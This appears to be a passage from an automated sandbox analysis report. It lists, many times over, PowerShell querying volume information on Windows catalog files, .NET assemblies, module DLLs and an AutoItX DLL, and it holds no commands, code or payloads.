        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0210~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
